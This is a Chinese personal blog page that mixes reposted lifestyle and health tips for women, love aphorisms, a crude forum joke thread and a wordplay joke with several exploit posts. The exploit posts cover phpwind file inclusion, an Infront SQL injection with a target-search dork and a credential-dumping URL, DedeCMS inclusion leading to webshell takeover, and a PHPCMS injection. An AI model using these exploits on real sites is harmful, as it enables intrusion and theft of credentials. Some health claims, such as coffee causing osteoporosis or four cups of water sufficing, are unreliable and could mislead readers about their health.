小枫's blog
www.51xiaofeng.com
女孩正确的生活方式(替你女朋友或老婆收着)
Jul 23rd
关于生活
1.在干净的床上裸睡
2. 生理期不吃巧克力,因为会加重痛经
3. 养成记录生理周期的习惯
4. 通过运动而非调整型内衣来塑造曲线
5. 不翘二郎腿,以免压迫神经
6. 贴身衣物不干洗
7. 拉风的丁字裤不适宜日常穿着
8. 去年的衣服要进行曝晒后才可以穿
9. 如非必要,不使用卫生护垫
10. 定期检查化妆品的保质期
11. 洗浴后一小时再化妆
12. 即使爱美,也不要在耳朵上部的外缘软骨部位穿耳洞
13. 了解自己的家庭病史,特别是母亲和外婆的病史
关于饮食
1. 在牛奶和豆浆之间,选择后者
2. 觉得还可以再吃半碗饭时,离开餐桌
3. 如果身体不感到饥渴,每天只需饮用4杯水
4. 多喝酸奶
5. 无论什么原因,都别抽烟
6. 在食谱里添加杂粮和蔬菜
7. 饮绿茶胜过红茶
8. 重视早餐多过晚餐
9. 控制盐的用量
10. 起床后先刷牙,再喝水
11. 经常嚼口香糖
12. 一早一晚,两个苹果可以有效改善便秘
13. 纯素食可能导致荷尔蒙分泌异常,造成不孕
14. 每周至少吃一次鱼
15. 远离可乐等碳酸饮料
16. 不喝久煮的火锅汤
17. 没有果汁牛奶这回事,它们是天生的冤家
18. 饭前吃水果胜过饭后
19. 睡前可以来一杯红葡萄酒
20. 喝咖啡可能引起女性骨质疏松
关于运动
1. 多享受早晨8-9点的阳光
2. 跑步、骑脚踏车等运动可以保持优美的腿部线条
3. 热水泡脚可有效预防静脉曲张
4. 精神极度疲倦时并不适宜以运动减压,休息更重要
5. 冬季少做户外运动
6. 10层以下,不乘坐电梯
7. 每三个月改变一次你的健身菜单
8. 每天运动半小时,而非周末运动3小时
9. 边看电视边做柔软体操
10. 经常散步
11. 午休也是健身的好时间,不一定非等到晚上
12. 光脚穿运动鞋固然舒服,却对健康不利
13. 睡半硬的床铺更有利于颈椎健康
14. 去正规的医院而非美容院接受按摩
15. 非运动状态下不喝功能性饮料
16. 运动后休息半小时再入浴
17. 不在过吵的健身房中锻炼
18. 正确的姿势比专程去健身更有效
关于爱情
1、如果发短信息给你喜欢的人,他不回。不要再发。
2、不要24小时都想念同一个人。可以分 一点给家人和朋友。
3、如果男人以他忙为理由,不来探你的病情,不回你的邮件,不关心你的现状,不能和你承担生活的重负,无法给你勇气。勇敢一点,自动离开。没有什么比自己关心自己来得实在。
4、学会承受痛苦。有些话,适合烂在心里,有些痛苦,适合无声无息的忘记。当经历过,你成长了,自己知道就好。
5、不要为了任何人任何事折磨自己。比如不吃饭、哭泣、自闭、抑郁,这些都是傻瓜才做的事。当然,偶尔傻一下有必要,人生不必时时聪明。
6、一次只爱一个人。
7、记住你喜欢的人的生日,包括你的家人,当然,还有自己。
8、穿有质感的衣服,找有质量的男朋友。他不一定很有钱,但是一定要能让你有安全感和开心。
9、爱那个爱你的人。如果只是你爱他,或者只是他爱你。趁早分开。女子不需要他人来假装疼爱,你也不需要假装疼爱某人。
10、如果决定离开一个人,行动要快一点,快刀斩乱麻;如果决定爱上一个人,时间拉长一点,看清楚是否适合你。
11、闲情时候自己煮花茶煮咖啡喝,或者做茶点吃,放一段柔情音乐,翻阅几页好书,然后睡个懒觉,快哉。
12、认真的对待你的工作。工作也许不如爱情来的让你心跳,但至少能保证你有饭吃,有房子住,而不确定的爱情给不了这些,所以,认真努力的工作。
13、宁缺毋滥。不要因为寂寞随手抓一个男人,这对你和他都不公平,而且太缺乏责任感。
14、对你不喜欢的追求者的示好和关心坚定的说不和拒绝。即使他说,这不关你的事。
15、如果没有人陪,学着一个人完成。
16、任何场合,保持应有的涵养。学会说谢谢、辛苦您、对不起。做错了事情要懂得道歉和改过。
关于爱情:
不要认为后面还有更好的,因为现在拥有的就是最好的。不要认为还年轻可以晚些结婚,爱情是不等年龄的。不要因为距离太远而放弃,爱情可以和你一起坐火车的。不要因为对方不富裕而放弃,只要不是无能的人,勤劳可以让你们富裕的。不要因为父母反对而放弃,你会发现因为这个原因而反放弃的爱情,将是你一生的悔恨。其实对于爱情,越单纯越幸福。一生只谈一次恋爱是最好的,经历的太多了,会麻木;分离多了,会习惯;换恋人多了,会比较;到最后,你不会再相信爱情;你会自暴自弃;你会行尸走肉;你会与你不爱的人结婚,就这样过一辈子。
关于爱情:
也许爱情是一部忧伤的童话,惟其遥远与真实。放弃一个爱你的人并不痛苦,放弃一个你爱的人那才痛苦。若是有缘时间空间都不是距离,若是无缘总是相聚也无法合意;凡事不必太在意,更不需去强求,就让一切随缘。逃避不一定躲得过;面对不一定最难过;孤独不一定不快乐;得到不一定长久;失去不一定不再拥有。爱是一种享受,即使痛苦也会觉得幸福;爱是一种体会,即使心碎也会觉得甜蜜;爱是一种经历,即使破碎也会觉得美丽;不要因为寂寞而错爱,不要因为错爱而寂寞一生。
关于伴侣:
伴侣不是结婚时发誓非你不娶或非你不嫁的那个人,而是发现你身上有许多缺点仍然选择你的那个人;伴侣不是生活中你爱吃黄瓜ta也爱吃黄瓜的那个人,而是你吃蛋清ta吃蛋黄的那个人;伴侣不是天黑了和你一起手挽手走进饭店的那个人,而是守在门口巴望你回来共进晚餐的那个人;伴侣不是和你大谈爱情,把“我爱你”挂在嘴边的那个人,而是和你平淡的唠叨柴米油盐、锅碗瓢盆的那个人。在幸福的婚姻中,伴侣已不是一个具体的人,而是你和ta在几十年的岁月中沉淀下来的:一份默契、一份温情、一份平淡、一份理解、一份宽容。爱ta就要让ra开心,这就是伴侣……..
关于承诺:
在古希腊传说中,情侣都将戒指套在对方的中指上,因为他们相信那儿有一根血管直通心脏。所以戒指的意思就是用心承诺!但是人世间有多少爱能生死白头,又有多少的情可以天长地久?所以你选择共度一生得未必是你最爱的,你最爱的未必能和你共度一生。多少的有情人走不进彼此的今生,只能苦苦的相约于来世;而多少的男男女女走过爱情走进婚姻却不会再珍惜彼此的付出。所以记得珍惜你爱的人,把每一个平淡的今天当成是彼此相依的最后一刻,好好握紧爱人的手,即使ta容颜已老,即使ta满面沧桑,那也是你记忆中永恒的温馨。别忘了守住对ta的承诺,别忘了牵住ta的手,一生一世一辈子…..
关于人生:
人生如梦,岁月无情。蓦然回首,才发现人活着是一种心情。穷也好,富也好,得也好,失也好。一切都是过眼云烟。想想,不管昨天、今天、明天,能豁然开朗就是美好的一天。不管亲情、友情、爱情,能永远珍惜就是好心情。记得有一个经典短信这样写着:曾经拥有的不要忘记;已经得到的更加珍惜;属于自己的不要放弃;已经失去的留作回忆;想要得到的一定要努力;累了把心靠岸;选择了就不要后悔;苦了才懂得满足;痛了才享受生活;伤了才明白坚强;总有起风的清晨;总有绚烂的黄昏;总有流星的夜晚。人生就像一张有去无回的单程车票,没有彩排,每一场都是现场直播。把握好每次演出便是对人生最好的珍惜。把握现在,畅享人生!
关于友情:
有一天,友情和爱情碰见。爱情问友情:世上有我了,为什么还要有你的存在?友情笑着说:爱情会让人们流泪,而友情的存在就是帮人们擦干眼泪!朋友就是:偶尔会为你担心、向你关心、替你懆心、想你开心、逗你开心、请你放心。朋友之间,懂得关怀才是难得…..伤心时不妨和我说;痛苦时别忘了跟我讲;有病时别忘了通知我;困难时记得要请教我;失望时要想起还有我;开心时更不要忘记我。朋友的定义,就在于此…..我们是朋友,这就够了…….
关于微笑:
被人误解的时候能微微的一笑,这是一种素养;受委屈的时候能坦然的一笑,这是一种大度;吃亏的时候能开心的一笑,这是一种豁达;处窘境的时候能自嘲的一笑,这是一种智慧;无奈的时候能达观的一笑,这是一种境界;危难的时候能泰然一笑,这是一种大气;被轻蔑的时候能平静的一笑,这是一种自信;失恋的时候能轻轻的一笑,这是一种洒脱。不管是有什么事情,为了什么原因…..我们每天都要开心一笑………..
关于生活:
日出东海落西山,愁也一天,喜也一天;遇事不钻牛角尖,人也舒坦,心也舒坦;每天领取谋生钱,多也喜欢,少也喜欢;少荤多素日三餐,粗也香甜,细也香甜;新旧衣服不挑捡,好也御寒,赖也御寒;常与知己聊聊天,古也谈谈,今也谈谈;全家老少互慰勉,贫也相安,富也相安。
关于幸福:
相传幸福是个美丽的玻璃球,跌碎散落在世间的每个角落。有的人捡到多些,有的人捡到少些。却没有人能拥有全部。爱你所爱选你所选,珍惜现在所拥有的一切。人活着就是一种心情,把握今天,设置明天,储存永远。只要用心感受,幸福就会永远存在。
——————
人总是对自己拥有的东西不珍惜,直到不再拥有时才会加倍怀念,而在得知自己快失去自己所拥有的东西而又无能为力时,就寻死觅活地不肯放手,歇斯底里往往发生在这个时候,而对于生命的执著确实是到死才放手
ML一小时意味着什么?(不笑你用鸡蛋砸我)
Jul 15th
呵呵,刚刚和女友做完,65分钟,看表做的,不包括前戏,频率平均每分钟150下。要不是她催着要去吃东西,我真的不知还能做多久。这事儿用不着说假,又没有奖品得。做完出去吃了一大碗混饨。以前有过两个多小时的记录,那次把包P都弄青了,最后还是不能S,两个人都觉得没什么意思了,就没继续了。不过平时也就半个小时的样子,只要女朋友说她吃饱了我就不继续了。她的快乐就是我的快乐。
这方面我确实有一些经验和技巧,以后跟大家说说,应该说ML也是个系统工程,呵呵。
强回开始
二楼:
一分钟=60秒
150/60=2.5次/秒
2.5*65*60=9750次
套用星爷那句话:我对楼主的敬仰尤如涛涛江水连绵不绝,又尤如黄河泛滥一发不可收拾
三楼:
假如楼主的小JJ是15厘米的话,那么在这次性生活中,楼主的小JJ一共步行了9750*0.15*2=2925米。
四楼:
楼主应该是两冲程的
五楼:
计算题:如果是个活塞,楼主已经打进去多少气了?
六楼:
应该是楼主做了多少功?转化为电能是多少?
七楼:
根据机械原理,淬火可以获得更高的硬度,退火可以获得更强的耐磨性能,估计你俩人就做过这样的热处理。
八楼:
计算题:如果是个活塞,楼主已经打进去多少气了?
回您的话:假如楼主的小JJ直径是4CM
0.02*0.02*3.14*2925=3.6738(立方米)
答:楼主已经打进去3.6738立方米气去了,他的女友按体重60G来算,体积约是0.06立方米,如果内部全是空的,那么现在他已经打暴了61.23个女友四舍五入,他打暴了61个女友,假如他女友能承受两倍大气压,他也打暴了30.5个,除去泄露的那部分气体,他打暴了30个女友。
另外,求证:以楼主的体重为65G计算,有那位朋友,计算出他克服地球吸引力做了多少无用功?
九楼:
请问,经过热处理工艺,楼主的洛氏硬度达到多少?是不是还要经过渗碳处理?然后经过调质处理总该行了吗?
十楼:
q请问楼猪的DD经过9000多次的摩擦后温度达到多少会不会影响精~子的成活率
十一楼:
另外,求证:以楼主的体重为65G计算,有那位朋友,计算出他克服地球吸引力做了多少无用功?
答:物理快忘光了,根据依稀所记小心求证一下,有错漏请楼下指出。
假如楼主高175,楼主mm高165。
男上女下的姿势,楼主双膝着地,高楼主mm约40cm,假如楼主的小JJ是15厘米的话,则H=40+15=55CM,以30分钟计算,做功为MGH=65*9.8*0.55*(2*150*30)=3153150J。
另外,求证:以楼主的体重为65G计算,请楼下哪位朋友,计算出他以小狗式坚持30分钟克服地球吸引力做了多少无用功?
十三楼:
居然还是两个缸的。。。
每分钟150下,坚持四舍五入按60分钟算。。连接轴承部分的摩擦耗损相当严重啊
十四楼:
居然还是两个缸的。。。
每分钟150下,坚持四舍五入按60分钟算。。连接轴承部分的摩擦耗损相当严重啊
楼主注意保养
勤换机油
检查刹车片
四轮要定位
定期大修
估计再用十年问题不大
十五楼:
另外,求证:以楼主的体重为65G计算,请楼下哪位朋友,计算出他以小狗式坚持0分钟克服地球吸引力做了多少无用功?
更正一下,楼主自己已经说了,他是做了65分钟,还是看着表做的,如果能看着表做,一般说来他不是俯卧式的,以小狗式是很有可能的
答:0.水平用功,没有克服地球引力,与时间和体重都无关!!!
十六楼:
摩擦生热,楼主可以做道火爆JJ大菜拉.完事后吃,大补啊~~~~~
十七楼:
我错了。
之前回贴我把做功算成(mgh*次数),其中H算成了40+15,严重错误。
H应该等于{小JJ长度*sin(插入角度)}才对。当然也不排除楼主是张弓搭箭,境外瞄准再发射。
我为我物理知识的贫乏而羞愧,并深切地向我的初中物理老师张老师致歉。学生辜负您了!
十八楼:
这是高中物理题啊,晕!
北丐更正得蛮好,证明了我的计算,角度为0的时候(小狗式),{小JJ长度*sin0}=0.
LZ克服地球引力做功为0。
十九楼:
另:古代有钻木取火,为什么男女主角取不到火,是不是女主角水太大,请用数学方法解释
二十楼:
楼主的邻居打119报警,说有橡胶着火的味道,消防队员架云梯往上一看原来是在钻B取火,消防队员说;这样不对,取火不应该再加火了。楼主说:不加水会涨缸!我知道好多事情是存在的,有人说只在两种时间做,一种是下雨的时间,一种是不下雨的时间。也有人说一年只做两次,一次才做半年。也有人说一天就是一日,一日就是一天。
这些我都信。我只是诧异每秒2.5次的频率,换成冲程也是每秒2.5转,每分就是150转呢,这个速度可以起
二十一楼:
照楼主这个钻法,楼主还要钻多久,才能击穿。。。。
二十二楼:
看来大家对于淬火工序都比较了解了。但是我要提醒
二十三楼:
连续硬2个多小时都难,别说动了,您要不是吹牛,那一定您和您女友都生长了德国原厂的套装活塞及缸套,另外有壳牌超级灰喜力润滑油配合润滑,世界顶级名车配置达到如此标准也就不会让大家感到惊讶了!!!!!!!!
另请问:您生长的是下面这款JJ吗?
二十四楼:
反坦克穿甲燃烧弹的工作原理是利用弹丸击中目标表面产生的高速撞击力,使弹丸内部的高速高温射流瞬间融化目标装甲,前面有同学论证了机械能转化为热能,那么,请问,在如此高速、高温运动条件下,在楼主精~液射出的瞬间,其穿甲能力是多大?又,楼主女友YD内壁的的复合装甲应为多厚才能避免被击穿?
二十五楼:
反坦克穿甲燃烧弹的工作原理是利用弹丸击中目标表面产生的高速撞击力,使弹丸内部的高速高温射流瞬间融化目标装甲,前面有同学论证了机械能转化为热能,那么,请问,在如此高速、高温运动条件下,在楼主精~液射出的瞬间,其穿甲能力是多大?又,楼主女友YD内壁的的复合装甲应为多厚才能避免被击穿?
标靶的外层尺寸为直径30毫米,厚度904大约为22毫米
中间为环形结构,内径45毫米,厚度为22毫米
试验方法对上述标靶以直径15毫米的JB弹,在频率2.5次/秒、30mm/s速度的条件下进行射击。LZ炮弹中液体含量为20%
试验结果穿甲试验共进行了2.5*65*60=9750次,试验条件、姿势、角度各不相同,其中无一次贯穿
对试验结果的分析由上述试验结果可以作出如下分析:
●高强度肉膜装甲,可以有效地防止内层装甲板被击穿
●射弹对叠层肉膜装甲射击时的弹道特性,和表层肉膜板的硬度有极大关系。为防止界
面不被击穿,外层装肉板的硬度应为洛氏硬度53以上。
●由于肉膜的润滑剂的剪切强度低,它可以生成稀疏的冲击波,使肉膜装甲的损坏增大,抗弹性降低。
●由不被击穿到完全被击穿的过渡领域,其速度阈值可以由试验加以确定。
●试验结果表明,发现有影响整个标靶抗弹性的“局部效应”和“整体效应”。局部效应和标靶的材料特性,即外层装甲的硬度、肉膜装甲的抗剪强度有关;整体效应和标靶的结构特性有关。
可以看出,穿破甲过程,是一个十分复杂的过程,影响因素多,作用时间极短,研究的难度很大。但即使如此,仍然可以得出许多有规律性的结论。
二十六楼:
已知:楼主体重65G,楼主每次冲击振幅15MM,冲击频率2.5HZ。假定楼主所住大楼重58吨,高20米,假定楼主是住顶层,此楼的振动频率也是2.5HZ,(共振)而楼主的能量全为楼体吸收,楼顶层振幅超过30CM即可倒塌,哪位计算一下,楼主多长时间就可以把楼震塌?
严证声明;美国世贸大楼是被本。拉登炸毁,不是楼主所为,不管计算出什么结果,请不要将此问题与反恐挂钩,由此引起的法律纠纷剑胆芹心概不负责,本论题解释权归美国FBI机构解释。
根据达尔文往生物进化论中的一个重要论断--用进废退!那么在如此高强度的煅烧下,楼主的某些部位会有较大的增强,有哪位计算一下,需要经过多少代楼主才可以进化为新的物种?
终于找到这个破喉咙的笑话了
Jul 14th
有一天,魔王抓走公主,公主一直在叫”救命”.
魔王:你尽管叫破喉咙吧,没有人会来救你的! 啊哈哈哈
公主:破喉咙!破喉咙!
没有人:公主,我来救你了!
魔王:说曹操曹操到!
曹操:魔王,你叫我干嘛?
魔王:哇呀!看到鬼了!
鬼:呵~被发现了!
呵:胡说,谁发现我了?
谁:关我屁事!
魔王:oh~my god!
上帝:谁叫我!?
谁:没有人叫你啊!
没有人:我哪有!!
… …
据说魔王从此得了精神分裂症~~~~~~
网易邮箱被日了
Jul 3rd
http://mail.126.com/css/hack.txt
http://mail.163.com/hd/hack.txt
http://mail.188.com/hd/hack.txt
B907TE~C[0T_[WQ(6D2.png)
http://mail.yeah.net/css/hack.txt
phpwind 7.5 0day漏洞运用
Jun 26th
phpwind 7.5 Multiple Include Vulnerabilities
壹.api/class_base.php本地包含漏洞
1.描敘
api/class_base.php文件裏callback函數裏$mode變量沒有過濾導致任意包含本地文件,從而可以執行任意PHP命令.
2. 具體分析
api/class_base.php文件裏:
function callback($mode, $method, $params) {
if (!isset($this->classdb[$mode])) {
if (!file_exists(R_P.’api/class_’ . $mode . ‘.php’)) {
return new ErrorMsg(API_MODE_NOT_EXISTS, “Class($mode) Not Exists”);
}
require_once(R_P.’api/class_’ . $mode . ‘.php’); //這裏
$this->classdb[$mode] = new $mode($this);
}
if (!method_exists($this->classdb[$mode], $method)) {
return new ErrorMsg(API_METHOD_NOT_EXISTS, “Method($method of $mode) Not Exists”);
}
!is_array($params) &&$params = array();
return @call_user_func_array(array(&$this->classdb[$mode], $method), $params);
}
我們繼續跟壹下具體變量傳遞的過程. 上面的函數在run()裏有調用:
function run($request) {
$request = $this->strips($request);
if (isset($request['type']) &&$request['type'] == ‘uc’) {
$this->type = ‘uc’;
$this->apikey = $GLOBALS['uc_key'];//註意這個變量也是該漏洞的關鍵
} else {
$this->type = ‘app’;
$this->apikey = $GLOBALS['db_siteownerid'];
$this->siteappkey = $GLOBALS['db_siteappkey'];
}
/***
if ($this->type == ‘app’ &&!$GLOBALS['o_appifopen']) {
return new ErrorMsg(API_CLOSED, ‘App Closed’);
}
***/
ksort($request);
reset($request);
$arg = ”;
foreach ($request as $key => $value) {
if ($value &&$key != ‘sig’) {
$arg .= “$key=$value&”;
}
}
if (md5($arg . $this->apikey) != $request['sig']) { //註意這個判斷,需要繞過它.上面的代碼可以看的出來$this->apikey = $GLOBALS['uc_key'],和$request['sig']我們
//都可以操控,那麽很轻易繞過它
return new ErrorMsg(API_SIGN_ERROR, ‘Error Sign’);
}
$mode = $request['mode']; //取$mode 沒有過濾直接進入下面的callback()
$method = $request['method'];
$params = isset($request['params']) ? unserialize($request['params']) : array();
if (isset($params['appthreads'])) {
if (PHP_VERSION <5.2) {
require_once(R_P.’api/class_json.php’);
$json = new Services_JSON(true);
$params['appthreads'] = $json->decode(@gzuncompress($params['appthreads']));
} else {
$params['appthreads'] = json_decode(@gzuncompress($params['appthreads']),true);
}
}
if ($params &&isset($request['charset'])) {
$params = pwConvert($params, $this->charset, $request['charset']);
}
return $this->callback($mode, $method, $params); //調用callback ()
}
我們繼續看看run()函數的調用:
在pw_api.php文件裏:
$api = new api_client();
$response = $api->run($_POST + $_GET);//直接run了$_POST , $_GET提交的變量.
上面的分析是逆行分析了整個漏洞變量提交的過程,其實我們這個漏洞還包含壹次編碼與解碼的問:require_once(R_P.’api/class_’ . $mode . ‘.php’);這個需要繞過魔術引號才可以
包含轻易文件.我們註意看run()的第壹句
$request = $this->strips($request);
strips()的代碼:
function strips($param) {
if (is_array($param)) {
foreach ($param as $key => $value) {
$param[$key] = $this->strips($value);
}
} else {
$param = stripslashes($param); //變量直接使用了stripslashes,那麽我們可以直接繞過魔術引號了 
}
return $param;
}
3.POC/EXP
缺
4.FIX
由於漏洞信息的外泄,官方針對這個漏洞已經做出了修補:
http://www.phpwind.net/read-htm-tid-914851.html
具體代碼:
require_once Pcv(R_P.’api/class_’ . $mode . ‘.php’);
function Pcv($filename,$ifcheck=1){
$tmpname = strtolower($filename);
$tmparray = array(‘ http://’,”\0“); //過濾了http:// \0 意思是不讓遠程 不讓截斷
$ifcheck &&$tmparray[] = ‘..’; //過濾了.. 意思是不讓轉跳目錄
if (str_replace($tmparray,”,$tmpname)!=$tmpname) {
exit(‘Forbidden’);
}
return $filename;
}
從Pcv()可以看出來phpwind的補丁風格是很猥瑣的,單從這個pcv來看 還有很多的邏輯問題,比如http://這個過濾很搞笑,人家就不可以用ftp://? …
二.apps/share/index.php遠程包含漏洞
1.描敘
apps/share/index.php 裏$route和$basePath變量沒有初始化,導致遠程包含或者本地包含php文件,導致執行任意php代碼
2.具體分析
<?php
if ($route == “share”) {
require_once $basePath . ‘/action/m_share.php’;
} elseif ($route == “sharelink”) {
require_once $basePath . ‘/action/m_sharelink.php’;
}
?>
這個漏洞好象不太需要分析!!!! 我建議寫這個代碼的人應該扣除年終獎…
3.POC/EXP
缺
4.FIX
等待官方補丁,假如用不著的朋友直接把這個文件刪除好了.
三.apps/groups/index.php遠程包含漏洞
1.描敘
apps/groups/index.php 裏$route和$basePath變量沒有初始化,導致遠程包含或者本地包含php文件,導致執行任意php代碼
2.具體分析
<?php
if ($route == “groups”) {
require_once $basePath . ‘/action/m_groups.php’;
} elseif ($route == “group”) {
require_once $basePath . ‘/action/m_group.php’;
} elseif ($route == “galbum”) {
require_once $basePath . ‘/action/m_galbum.php’;
}
這個漏洞好象不太需要分析!!!! 我建議寫這個代碼的人應該扣除年終獎…
3.POC/EXP
缺
4.FIX
等待官方補丁,假如用不著的朋友直接把這個文件刪除好了.
最新消息 目前官方已經發布補丁http://www.phpwind.net/read-htm-tid-914851.html
Infront 程序存在SQL注入漏洞
Jun 26th
Infront 程序存在SQL注入漏洞,可获取管理权限。
批量:google:intext:Powered by Infront
漏洞页面 : breaking_news.php
Exploit Code : http://www.hackzhi.org/变量路径/breaking_news.php?newsid=union select 1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login
后台登入:
http://www.hackzhi.org/变量路径/login.php
演示:http://www.hackzhi.org/breaking_news.php?newsid=-103+UNION+SELECT+1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login–
首发TheMaster
DedeCmsV5.6再爆0day 本地包含 鸡助0day漏洞
Jun 26th
DedeCmsV5.6 程序plus/carbuyaction.php 变量未初始化,造成本地文件包含漏洞。
代码:
<?php require_once (dirname(__FILE__) . “/../include/common.inc.php”); define(‘_PLUS_TPL_’, DEDEROOT.’/templets/plus’); require_once DEDEINC.’/dedetemplate.class.php’; require_once DEDEINC.’/shopcar.class.php’; require_once DEDEINC.’/memberlogin.class.php’; if($cfg_mb_open==’N') { ShowMsg(“系统关闭了会员功能,因此你无法访问此页面!”,”javascript:;”); exit(); } $cfg_ml = new MemberLogin(); if(!isset($dopost) || empty($dopost)){ //只要$dopost不为空就行,By:qing。 … }elseif($dopost == ‘return’){ require_once DEDEINC.’/payment/’.$code.’.php’; //变量$code未初始化, $pay = new $code; $msg=$pay->respond(); ShowMsg($msg,”javascript:;”,0,3000); exit(); } ?>
测试代码:http://www.hackqing.cn/plus/carbuyaction.php?dopost=return&code=../../
1、 plus/carbuyaction.php文件:
//漏洞出现下$dopost 为return的时候,$code变量没有被赋值,由于dedecms的全局机制可以任意给其赋值,从而带入包含,导致本地包含漏洞。
…
elseif($dopost == ‘return’){ //$code直接引入, require_once DEDEINC.’/payment/’.$code.’.php’; $pay = new $code; $msg=$pay->respond(); ShowMsg($msg,”javascript:;”,0,3000); exit(); }
…
2、 include/common.inc.php:
//无论是否打开magic_quotes_gpc,系统都对传进来的变量进行了addslashes处理,…
function _RunMagicQuotes(&$svar) { if(!get_magic_quotes_gpc()) { if( is_array($svar) ) { foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v); } else { $svar = addslashes($svar); } } return $svar; } //模拟register_globals,对_GET、_POST、_COOKIE全局化, foreach(Array(‘_GET ‘,’_POST’,'_COOKIE’) as $_request) { foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v); }
…
三、漏洞利用
1. windows系统:
IIS或者某些apache版本下php文件系统可以进行路径截断,
可以通过
///////////////////////////////////(若干/)
/././././././././././././././././(若干/.)
进行截断。
于是可以上传一个精心构造带有恶意php代码的图片,然后注册一个用户上传,比如上传到uploads/userup/2/12Ka5357-c53.jpg,于是可以通过访问:
http://127.0.0.1/ plus/carbuyaction.php?dopost=return&code=../../uploads/userup/2/12Ka5357-c53.jpg///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////(若干/)
则有可能执行12Ka5357-c53.jpg中的恶意php代码,从而达到入侵的目的。
2.linux系统:
1)apache某些版本php文件系统支持路径截断,于是同windows下,可以通过
///////////////////////////////////(若干/)
/././././././././././././././././(若干/.)
进行截断。
利用方法同windows:
于是可以上传一个精心构造带有恶意php代码的图片,然后注册一个用户上传,比如上传到uploads/userup/2/12Ka5357-c53.jpg,于是可以通过访问:
http://127.0.0.1/ plus/carbuyaction.php?dopost=return&code=../../uploads/userup/2/12Ka5357-c53.jpg///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////(若干/)
则有可能执行12Ka5357-c53.jpg中的恶意php代码,从而达到入侵的目的。
2)旁注攻击
比如目标站是www.aaa.com,漏洞文件是:
http://www.aaa.com/ plus/carbuyaction.php
同服务器有个站点www.bbb.com可以轻松入侵,拿到webshell,但是由于权限控制,www.bbb.com站的webshell访问或者控制不了www.aaa.com,于是我们可以通过这个本地包含漏洞达到入侵www.aaa.com的目的。
1. 通过www.bbb.com上传一个webshell到/tmp文件夹下,比如文件名是shell.php;
2. 访问http://www.aaa.com/plus/carbuyaction.php?code=../../../../../../../tmp/shell则可以成功包含我们上传到临时文件夹下的webshell,由于当前是www.aaa.com的权限,则可以完全控制目标站点:www.aaa.com。
PHPCMS网站管理系统ADSCLASS.PHP页面过滤不严导致SQL注入漏洞
Jun 25th
添加时间:
2010-05-24
系统编号:
WAVDB-01629
影响版本:
phpcms2008sp4_UTF8_100510
程序介绍:
Phpcms是一款基于 PHP+Mysql 架构的网站内容管理系统,也是一个开源的 PHP 开发平台。Phpcms 采用模块化方式开发,功能易用便于扩展,可面向大中型站点提供重量级网站建设解决方案。3年来,凭借 Phpcms 团队长期积累的丰富的Web开发及数据库经验和勇于创新追求完美的设计理念,使得 Phpcms 得到了近10万网站的认可,并且越来越多地被应用到大中型商业网站
漏洞分析:
ads\include\ads.class.php
function edit($ads, $adsid, $username = ”) //110行
{
if(!$this->check_form($ads)) return FALSE;
$ads = $this->check_form($ads);
if(defined(‘IN_ADMIN’))
}
$ads['fromdate'] = strtotime($ads['fromdate']);
$ads['todate'] = strtotime($ads['todate']);
{
$this->adsid = $adsid;
$where = ‘ adsid=’.$this->adsid;
if($username) $where .= ” AND username=’$username’”;
return $this->db->update($this->table, $ads, $where);
}
Ads\member.php
if(!$c_ads->edit($info, $adsid, $_username)) showmessage($c_ads->msg(), ‘goback’); //47行
变量$adsid没有经过处理就直接进入SQL查询,造成SQL注入。
漏洞利用:
1、注册普通会员
2、 预定广告并修改adsid值从而进行SQL注入
解决方案:
厂商补丁:
PHPCMS
——-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.phpcms.cn/
信息来源:
<来源: Bug.Center.Team
